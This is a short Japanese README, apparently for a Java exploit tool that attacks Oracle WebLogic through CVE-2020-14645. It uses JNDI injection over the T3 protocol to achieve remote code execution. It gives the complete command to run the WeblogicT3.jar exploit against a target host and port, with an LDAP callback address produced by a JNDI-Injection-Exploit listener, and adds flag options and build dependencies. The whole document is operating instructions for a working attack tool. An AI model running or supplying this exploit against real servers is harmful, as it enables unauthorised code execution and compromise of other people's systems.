
CVE-2020-14645を標的としたJavaベースのエクスプロイトで、Oracle WebLogic T3プロトコルにJNDIインジェクションを用いてリモートコード実行を行います。
まず NDI-Injection-Exploit を使用してリッスンし、LDAP アドレスを生成します。
java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]
-Tatget と -RMI は必須です。HTTPS では --SSL パラメータを使用可能です。-Port のデフォルトは 7001 です。
自分でコンパイルする場合は、coherence.jar と wlfullclient.jar を追加する必要があります。